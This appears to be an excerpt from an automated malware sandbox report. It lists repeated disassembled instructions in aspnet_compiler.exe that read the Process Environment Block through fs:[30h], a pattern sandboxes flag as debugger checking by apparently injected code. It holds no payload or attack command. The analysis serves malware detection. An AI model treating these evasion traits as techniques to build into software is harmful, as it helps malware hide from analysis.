                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018261C3 mov eax, dword ptr fs:[00000030h]4_2_018261C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01790124 mov eax, dword ptr fs:[00000030h]4_2_01790124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018361E5 mov eax, dword ptr fs:[00000030h]4_2_018361E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017901F8 mov eax, dword ptr fs:[00000030h]4_2_017901F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov eax, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E10E mov ecx, dword ptr fs:[00000030h]4_2_0180E10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01820115 mov eax, dword ptr fs:[00000030h]4_2_01820115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180A118 mov ecx, dword ptr fs:[00000030h]4_2_0180A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180A118 mov eax, dword ptr fs:[00000030h]4_2_0180A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov eax, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017DE1D0 mov ecx, dword ptr fs:[00000030h]4_2_017DE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E019F mov eax, dword ptr fs:[00000030h]4_2_017E019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A197 mov eax, dword ptr fs:[00000030h]4_2_0175A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834164 mov eax, dword ptr fs:[00000030h]4_2_01834164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A0185 mov eax, dword ptr fs:[00000030h]4_2_017A0185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178C073 mov eax, dword ptr fs:[00000030h]4_2_0178C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01762050 mov eax, dword ptr fs:[00000030h]4_2_01762050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E6050 mov eax, dword ptr fs:[00000030h]4_2_017E6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018260B8 mov eax, dword ptr fs:[00000030h]4_2_018260B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018260B8 mov ecx, dword ptr fs:[00000030h]4_2_018260B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6030 mov eax, dword ptr fs:[00000030h]4_2_017F6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A020 mov eax, dword ptr fs:[00000030h]4_2_0175A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C020 mov eax, dword ptr fs:[00000030h]4_2_0175C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E016 mov eax, dword ptr fs:[00000030h]4_2_0177E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E4000 mov ecx, dword ptr fs:[00000030h]4_2_017E4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01802000 mov eax, dword ptr fs:[00000030h]4_2_01802000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C0F0 mov eax, dword ptr fs:[00000030h]4_2_0175C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A20F0 mov ecx, dword ptr fs:[00000030h]4_2_017A20F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0175A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E60E0 mov eax, dword ptr fs:[00000030h]4_2_017E60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017680E9 mov eax, dword ptr fs:[00000030h]4_2_017680E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E20DE mov eax, dword ptr fs:[00000030h]4_2_017E20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017580A0 mov eax, dword ptr fs:[00000030h]4_2_017580A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F80A8 mov eax, dword ptr fs:[00000030h]4_2_017F80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176208A mov eax, dword ptr fs:[00000030h]4_2_0176208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov ecx, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E035C mov eax, dword ptr fs:[00000030h]4_2_017E035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E2349 mov eax, dword ptr fs:[00000030h]4_2_017E2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181C3CD mov eax, dword ptr fs:[00000030h]4_2_0181C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018043D4 mov eax, dword ptr fs:[00000030h]4_2_018043D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018043D4 mov eax, dword ptr fs:[00000030h]4_2_018043D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov eax, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov eax, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov ecx, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180E3DB mov eax, dword ptr fs:[00000030h]4_2_0180E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175C310 mov ecx, dword ptr fs:[00000030h]4_2_0175C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01780310 mov ecx, dword ptr fs:[00000030h]4_2_01780310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A30B mov eax, dword ptr fs:[00000030h]4_2_0179A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A30B mov eax, dword ptr fs:[00000030h]4_2_0179A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179A30B mov eax, dword ptr fs:[00000030h]4_2_0179A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017963FF mov eax, dword ptr fs:[00000030h]4_2_017963FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E3F0 mov eax, dword ptr fs:[00000030h]4_2_0177E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E3F0 mov eax, dword ptr fs:[00000030h]4_2_0177E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0177E3F0 mov eax, dword ptr fs:[00000030h]4_2_0177E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017703E9 mov eax, dword ptr fs:[00000030h]4_2_017703E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov eax, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov ecx, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov eax, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01838324 mov eax, dword ptr fs:[00000030h]4_2_01838324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017683C0 mov eax, dword ptr fs:[00000030h]4_2_017683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A3C0 mov eax, dword ptr fs:[00000030h]4_2_0176A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E63C0 mov eax, dword ptr fs:[00000030h]4_2_017E63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0183634F mov eax, dword ptr fs:[00000030h]4_2_0183634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0182A352 mov eax, dword ptr fs:[00000030h]4_2_0182A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01808350 mov ecx, dword ptr fs:[00000030h]4_2_01808350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758397 mov eax, dword ptr fs:[00000030h]4_2_01758397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758397 mov eax, dword ptr fs:[00000030h]4_2_01758397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01758397 mov eax, dword ptr fs:[00000030h]4_2_01758397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178438F mov eax, dword ptr fs:[00000030h]4_2_0178438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178438F mov eax, dword ptr fs:[00000030h]4_2_0178438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0180437C mov eax, dword ptr fs:[00000030h]4_2_0180437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E388 mov eax, dword ptr fs:[00000030h]4_2_0175E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E388 mov eax, dword ptr fs:[00000030h]4_2_0175E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175E388 mov eax, dword ptr fs:[00000030h]4_2_0175E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764260 mov eax, dword ptr fs:[00000030h]4_2_01764260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764260 mov eax, dword ptr fs:[00000030h]4_2_01764260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01764260 mov eax, dword ptr fs:[00000030h]4_2_01764260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175826B mov eax, dword ptr fs:[00000030h]4_2_0175826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175A250 mov eax, dword ptr fs:[00000030h]4_2_0175A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01766259 mov eax, dword ptr fs:[00000030h]4_2_01766259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E8243 mov eax, dword ptr fs:[00000030h]4_2_017E8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E8243 mov ecx, dword ptr fs:[00000030h]4_2_017E8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0175823B mov eax, dword ptr fs:[00000030h]4_2_0175823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_018362D6 mov eax, dword ptr fs:[00000030h]4_2_018362D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702E1 mov eax, dword ptr fs:[00000030h]4_2_017702E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702E1 mov eax, dword ptr fs:[00000030h]4_2_017702E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702E1 mov eax, dword ptr fs:[00000030h]4_2_017702E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0176A2C3 mov eax, dword ptr fs:[00000030h]4_2_0176A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A250 mov eax, dword ptr fs:[00000030h]4_2_0181A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0181A250 mov eax, dword ptr fs:[00000030h]4_2_0181A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702A0 mov eax, dword ptr fs:[00000030h]4_2_017702A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017702A0 mov eax, dword ptr fs:[00000030h]4_2_017702A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0183625D mov eax, dword ptr fs:[00000030h]4_2_0183625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov ecx, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F62A0 mov eax, dword ptr fs:[00000030h]4_2_017F62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01810274 mov eax, dword ptr fs:[00000030h]4_2_01810274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0283 mov eax, dword ptr fs:[00000030h]4_2_017E0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0283 mov eax, dword ptr fs:[00000030h]4_2_017E0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017E0283 mov eax, dword ptr fs:[00000030h]4_2_017E0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E284 mov eax, dword ptr fs:[00000030h]4_2_0179E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179E284 mov eax, dword ptr fs:[00000030h]4_2_0179E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179656A mov eax, dword ptr fs:[00000030h]4_2_0179656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179656A mov eax, dword ptr fs:[00000030h]4_2_0179656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0179656A mov eax, dword ptr fs:[00000030h]4_2_0179656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768550 mov eax, dword ptr fs:[00000030h]4_2_01768550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01768550 mov eax, dword ptr fs:[00000030h]4_2_01768550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01770535 mov eax, dword ptr fs:[00000030h]4_2_01770535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0178E53E mov eax, dword ptr fs:[00000030h]4_2_0178E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017F6500 mov eax, dword ptr fs:[00000030h]4_2_017F6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01834500 mov eax, dword ptr fs:[00000030h]4_2_01834500
